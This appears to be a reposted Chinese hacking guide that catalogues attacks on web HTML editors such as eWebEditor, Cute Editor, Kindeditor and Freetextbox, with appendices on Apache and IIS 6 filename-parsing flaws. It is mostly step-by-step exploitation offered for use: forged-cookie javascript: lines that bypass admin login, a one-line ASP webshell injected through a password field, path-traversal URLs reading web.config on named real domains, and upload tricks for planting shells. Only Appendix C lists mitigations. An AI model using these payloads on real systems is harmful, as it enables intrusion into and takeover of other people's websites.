eWebEditor PHP/ASP…后臺(tái)通殺漏洞
影響版本: PHP ≥ 3.0~3.8與asp 2.8版也通用,或許低版本也可以,有待測(cè)試。
攻擊利用:
進(jìn)入后臺(tái)/eWebEditor/admin/login.php,隨便輸入一個(gè)用戶和密碼,會(huì)提示出錯(cuò)了.
這時(shí)候你清空瀏覽器的url,然后輸入
javascript:alert(document.cookie="adminuser="+escape("admin"));
javascript:alert(document.cookie="adminpass="+escape("admin"));
javascript:alert(document.cookie="admindj="+escape("1"));
而后三次回車,清空瀏覽器的URL,現(xiàn)在輸入一些平常訪問(wèn)不到的文件如../ewebeditor/admin/default.php,就會(huì)直接進(jìn)去。
eWebEditor for php任意文件上傳漏洞
影響版本:ewebeditor php v3.8 or older version
脆弱描述:
此版本將所有的風(fēng)格配置信息保存為一個(gè)數(shù)組$aStyle,在php.ini配置register_global為on的情況下我們可以任意添加自己喜歡的風(fēng)格,并定義上傳類型。
攻擊利用:
phpupload.html
eWebEditor JSP版漏洞
大同小異,我在本文檔不想多說(shuō)了,因?yàn)闆](méi)環(huán)境 測(cè)試,網(wǎng)上垃圾場(chǎng)那么大,不好排查。用JSP編輯器的我覺(jué)得eweb會(huì)比FCKeditor份額少得多。
eWebEditor 2.8 商業(yè)版插一句話木馬
影響版本:=>2.8 商業(yè)版
攻擊利用:
登陸后臺(tái),點(diǎn)擊修改密碼---新密碼設(shè)置為 1":eval request("h")'
設(shè)置成功后,訪問(wèn)asp/config.asp文件即可,一句話木馬被寫入到這個(gè)文件里面了.
eWebEditorNet upload.aspx 上傳漏洞(WebEditorNet)
脆弱描述:
WebEditorNet 主要是一個(gè)upload.aspx文件存在上傳漏洞。
攻擊利用:
默認(rèn)上傳地址:/ewebeditornet/upload.aspx
可以直接上傳一個(gè)cer的木馬
如果不能上傳則在瀏覽器地址欄中輸入javascript:lbtnUpload.click();
成功以后查看源代碼找到uploadsave查看上傳保存地址,默認(rèn)傳到uploadfile這個(gè)文件夾里。
southidceditor(一般使用v2.8.0版eWeb核心)
idceditor/datas/southidceditor.mdb">http://www.heimian.com/admin/southidceditor/datas/southidceditor.mdb
http://www.safe5com/admin/southidceditor/admin/admin_login.asp
http://www.dbjr.com.cn/admin/southidceditor/popup.asp
bigcneditor(eWeb 2.7.5 VIP核心)
其實(shí)所謂的Bigcneditor就是eWebEditor 2.7.5的VIP用戶版.之所以無(wú)法訪問(wèn)admin_login.asp,提示“權(quán)限不夠”4字真言,估計(jì)就是因?yàn)槠涫跈?quán)“Licensed”問(wèn)題,或許只允許被授權(quán)的機(jī)器訪問(wèn)后臺(tái)才對(duì)。
或許上面針對(duì)eWebEditor v2.8以下低版本的小動(dòng)作可以用到這上面來(lái).貌似沒(méi)多少動(dòng)作?
--------------------------------------------------------------------------------
Cute Editor
Cute Editor在線編輯器本地包含漏洞
影響版本:
CuteEditor For Net 6.4
脆弱描述:
可以隨意查看網(wǎng)站文件內(nèi)容,危害較大。
攻擊利用:
http://www.dbjr.com.cn/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config
--------------------------------------------------------------------------------
Webhtmleditor
利用WIN 2003 IIS文件名稱解析漏洞獲得SHELL
影響版本:<= Webhtmleditor最終版1.7 (已停止更新)
脆弱描述/攻擊利用:
對(duì)上傳的圖片或其他文件無(wú)重命名操作,導(dǎo)致允許惡意用戶上傳diy.asp;.jpg來(lái)繞過(guò)對(duì)后綴名審查的限制,對(duì)于此類因編輯器作者意識(shí)犯下的錯(cuò)誤,就算遭遇縮略圖,文件頭檢測(cè),也可使用圖片木馬 插入一句話來(lái)突破。
--------------------------------------------------------------------------------
Kindeditor
利用WIN 2003 IIS文件名稱解析漏洞獲得SHELL
影響版本: <= kindeditor 3.2.1(09年8月份發(fā)布的最新版)
脆弱描述/攻擊利用:
拿官方做個(gè)演示:進(jìn)入upload/2010/3/201003102334381513.jpg 大家可以前去圍觀。
Note:參見(jiàn)附錄C原理解析。
--------------------------------------------------------------------------------
Freetextbox
Freetextbox遍歷目錄漏洞
影響版本:未知
脆弱描述:
因?yàn)閒tb.imagegallery.aspx代碼中 只過(guò)濾了/但是沒(méi)有過(guò)濾\符號(hào)所以導(dǎo)致出現(xiàn)了遍歷目錄的問(wèn)題。
攻擊利用:
在編輯器頁(yè)面點(diǎn)圖片會(huì)彈出一個(gè)框(抓包得到此地址)構(gòu)造如下,可遍歷目錄。
http://www.dbjr.com.cn/Member/images/ftb/HelperScripts/ftb.imagegallery.aspx?frame=1&rif=..&cif=\..
--------------------------------------------------------------------------------
附錄A:
Apache文件名解析缺陷漏洞:
測(cè)試環(huán)境:apache 2.0.53 winxp,apache 2.0.52 redhat linux
1.國(guó)外(SSR TEAM)發(fā)了多個(gè)advisory稱Apache's MIME module (mod_mime)相關(guān)漏洞,就是attack.php.rar會(huì)被當(dāng)做php文件執(zhí)行的漏洞,包括Discuz!那個(gè)p11.php.php.php.php.php.php.php.php.php.php.php.php.rar漏洞。
2.S4T的superhei在blog上發(fā)布了這個(gè)apache的小特性,即apache 是從后面開(kāi)始檢查后綴,按最后一個(gè)合法后綴執(zhí)行。其實(shí)只要看一下apache的htdocs那些默認(rèn)安裝的index.XX文件就明白了。
3.superhei已經(jīng)說(shuō)的非常清楚了,可以充分利用在上傳漏洞上,我按照普遍允許上傳的文件格式測(cè)試了一下,列舉如下(亂分類勿怪)
典型型:rar
備份型:bak,lock
流媒體型:wma,wmv,asx,as,mp4,rmvb
微軟型:sql,chm,hlp,shtml,asp
任意型:test,fake,ph4nt0m
特殊型:torrent
程序型:jsp,c,cpp,pl,cgi
4.整個(gè)漏洞的關(guān)鍵就是apache的"合法后綴"到底是哪些,不是"合法后綴"的都可以被利用。
5.測(cè)試環(huán)境
a.php
然后增加任意后綴測(cè)試,a.php.aaa,a.php.aab....
By cloie, in ph4nt0m.net(c) Security.
附錄B:
安裝了iis6的服務(wù)器(windows2003),受影響的文件名后綴有.asp .asa .cdx .cer .pl .php .cgi
Windows 2003 Enterprise Edition是微軟目前主流的服務(wù)器操作系統(tǒng)。 Windows 2003 IIS6 存在著文件解析路徑的漏洞,當(dāng)文件夾名為類似hack.asp的時(shí)候(即文件夾名看起來(lái)像一個(gè)ASP文件的文件名),此時(shí)此文件夾下的任何類型的文件(比如.gif,.jpg,.txt等)都可以在IIS中被當(dāng)做ASP程序來(lái)執(zhí)行。這樣黑客即可上傳擴(kuò)展名為jpg或gif之類的看起來(lái)像是圖片文件的木馬文件,通過(guò)訪問(wèn)這個(gè)文件即可運(yùn)行木馬。如果這些網(wǎng)站中有任何一個(gè)文件夾的名字是以 .asp .php .cer .asa .cgi .pl 等結(jié)尾,那么放在這些文件夾下面的任何類型的文件都有可能被認(rèn)為是腳本文件而交給腳本解析器而執(zhí)行。
附錄C:
漏洞描述:
當(dāng)文件名為[YYY].asp;[ZZZ].jpg時(shí),Microsoft IIS會(huì)自動(dòng)以asp格式來(lái)進(jìn)行解析。
而當(dāng)文件名為[YYY].php;[ZZZ].jpg時(shí),Microsoft IIS會(huì)自動(dòng)以php格式來(lái)進(jìn)行解析。
其中[YYY]與[ZZZ]處為可變化字符串。
影響平臺(tái):
Windows Server 2000 / 2003 / 2003 R2 (IIS 5.x / 6.0)
修補(bǔ)方法:
1、等待微軟相關(guān)的補(bǔ)丁包
2、關(guān)閉圖片所在目錄的腳本執(zhí)行權(quán)限(前提是你的某些圖片沒(méi)有與程序混合存放)
3、校驗(yàn)網(wǎng)站程序中所有上傳圖片的代碼段,對(duì)形如[YYY].asp;[ZZZ].jpg的圖片做攔截
備注:
對(duì)于Windows Server 2008(IIS7)以及Windows Server 2008 R2(IIS7.5) 則未受影響.
相關(guān)文章
Ueditor百度編輯器的Html模式自動(dòng)替換樣式的解決方法
百度的Ueditor編輯器出于安全性考慮,用戶在html模式下粘貼進(jìn)去的html文檔會(huì)自動(dòng)被去除樣式和轉(zhuǎn)義。雖然安全的,但是非常不方便。做一下修改把這個(gè)功能去掉,需要的朋友可以參考下2017-03-03SyntaxHighlighter?Autoloader(自動(dòng)加載)最優(yōu)方式
SyntaxHighlighter是一款用于web頁(yè)面的代碼著色工具,可以用來(lái)著色多種語(yǔ)言,可以是HTML,CSS,Javascript,還可以是C,JAVA等編程語(yǔ)言,這里為大家介紹一下比較好的加載方案2023-06-06SyntaxHighlighter配合CKEditor插件輕松打造代碼語(yǔ)法著色
作為程序員在寫博客文章的時(shí)候,經(jīng)常要插入些代碼片斷,很多博客系統(tǒng)都提供代碼語(yǔ)法著色高亮顯示的功能或插件,讓代碼顯示更直接明了2012-09-09百度編輯器 ueditor 內(nèi)容編輯自動(dòng)套P標(biāo)簽,及p標(biāo)簽 替換
這篇文章主要介紹了百度編輯器 ueditor 內(nèi)容編輯自動(dòng)套P標(biāo)簽,及p標(biāo)簽 替換,需要的朋友可以參考下2017-03-03編輯器中designMode和contentEditable的屬性的介紹
先解釋一下在線編輯器的原理:首先需要IE5.0以上版本的支持.因?yàn)镮E5.0以上版本有一個(gè)編輯狀態(tài),designMode是document的屬性,意思是設(shè)置或獲取表明文檔是否可被編輯的值,默認(rèn)值為off或Inherit2008-11-11xhEditor 免費(fèi)的國(guó)產(chǎn)HTML在線編輯器
在線編輯器,CKeditor+CKfinder的組合是首選的,可惜CKfinder要收費(fèi),黃金搭檔只有1個(gè)是免費(fèi)的,又不想用回老版本,所以站長(zhǎng)只好另尋他路。2011-06-06FCKEditor 表單提交時(shí)運(yùn)行的代碼
我們?cè)谑褂胒ckeditor進(jìn)行提交的時(shí)候,會(huì)運(yùn)行的代碼,方便我們?cè)黾庸δ艿取?/div> 2009-06-06最新評(píng)論